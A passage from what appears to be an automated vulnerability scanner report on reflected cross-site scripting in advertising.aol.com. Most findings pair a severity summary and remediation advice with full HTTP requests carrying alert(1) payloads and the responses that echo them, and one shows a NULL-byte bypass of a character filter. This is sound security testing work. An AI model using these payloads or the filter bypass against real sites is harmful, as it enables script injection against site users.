Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /528e8"-alert(1)-"3333f1c57/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/528e8"-alert(1)-"3333f1c57/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.57. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7887"-alert(1)-"d9032cbe9c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b7887"-alert(1)-"d9032cbe9c7/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b7887"-alert(1)-"d9032cbe9c7/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.58. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b55e7"-alert(1)-"119da7d957f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b55e7"-alert(1)-"119da7d957f/3/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b55e7"-alert(1)-"119da7d957f/3/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.59. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 474b3"-alert(1)-"459125604c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /474b3"-alert(1)-"459125604c/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:36:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:36:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/474b3"-alert(1)-"459125604c/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.60. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4849"-alert(1)-"df23d7e0e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b4849"-alert(1)-"df23d7e0e6b/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b4849"-alert(1)-"df23d7e0e6b/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.61. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d039b"-alert(1)-"fcbdc04fa56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d039b"-alert(1)-"fcbdc04fa56/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/d039b"-alert(1)-"fcbdc04fa56/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.62. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ddf0"-alert(1)-"f916ec34f60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1ddf0"-alert(1)-"f916ec34f60/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1ddf0"-alert(1)-"f916ec34f60/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.63. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe48"-alert(1)-"7f3b58df0aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fbe48"-alert(1)-"7f3b58df0aa/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:37:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fbe48"-alert(1)-"7f3b58df0aa/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

6.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6dd"-alert(1)-"01757ed2f01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai6c6dd"-alert(1)-"01757ed2f01/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:00:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:00:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai6c6dd"-alert(1)-"01757ed2f01/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javas
...[SNIP]...

6.65. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44bcc"-alert(1)-"bb366ec97aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/nai.php44bcc"-alert(1)-"bb366ec97aa?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:01:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:01:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php44bcc"-alert(1)-"bb366ec97aa?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,a
...[SNIP]...

6.66. http://advertising.aol.com/nai/nai.php [action_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the action_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007bbed'><script>alert(1)</script>9ecd2285493 was submitted in the action_id parameter. This input was echoed as 7bbed'><script>alert(1)</script>9ecd2285493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /nai/nai.php?action_id=3%007bbed'><script>alert(1)</script>9ecd2285493 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 10:59:37 GMT
Content-Type: text/html
Content-Length: 13896


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3.7bbed'><script>alert(1)</script>9ecd2285493&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9962693' height='1' width='1'>
...[SNIP]...

6.67. http://advertising.aol.com/token/0/2/1170877546/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1170877546/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb106"-alert(1)-"2a8f8f75cb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fb106"-alert(1)-"2a8f8f75cb4/0/2/1170877546/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fb106"-alert(1)-"2a8f8f75cb4/0/2/1170877546/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.68. http://advertising.aol.com/token/0/3/1885310732/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1885310732/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8b5b"-alert(1)-"30d7f6c4bc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

